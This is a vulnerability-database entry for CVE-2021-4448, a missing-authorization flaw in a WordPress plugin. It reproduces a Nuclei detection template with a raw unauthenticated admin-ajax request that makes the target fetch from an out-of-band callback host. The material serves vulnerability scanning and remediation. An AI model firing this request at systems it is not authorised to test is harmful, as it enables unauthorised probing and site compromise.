CVE-2021-4448: Kaswara Modern VC Addons <= 3.0.1 - Missing Authorization

日期: 2026-01-08 | 影响软件: Kaswara Modern VC Addons | POC: 已公开

漏洞描述

The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.

PoC代码[已公开]

id: CVE-2021-4448

info:
  name: Kaswara Modern VC Addons <= 3.0.1 - Missing Authorization
  author: daffainfo
  severity: high
  description: |
    The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more.
  impact: |
    Unauthenticated attackers can perform unauthorized actions including file uploads, deletions, and data import, potentially leading to site compromise.
  remediation: |
    Deactivate and delete the plugin from the server
  reference:
    - https://codecanyon.net/item/kaswara-modern-visual-composer-addons/19341477
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kaswara/kaswara-modern-vc-addons-301-missing-authorization
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-4448
    epss-score: 0.43626
    epss-percentile: 0.97394
    cwe-id: CWE-862
    cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: kaswara_project
    product: kaswara
    framework: wordpress
    shodan-query: html:"kaswara"
  tags: cve,cve2021,wp,wordpress,wp-plugin,kaswara,oast,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=kaswaraImportDemo&contentUrl=http://{{interactsh-url}}/

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'missing/invalid WXR version number'

      - type: word
        part: interactsh_protocol
        words:
          - 'http'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022078e0b4343c25a0718ab930c56640fc9f6b59a6221647c7837e9eca4105cf4279022100c669f065d6bcf568cf22ef0f585d619367e6eb42efc39bc1e5b3dc506bae047c:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-4448.yaml

相关漏洞推荐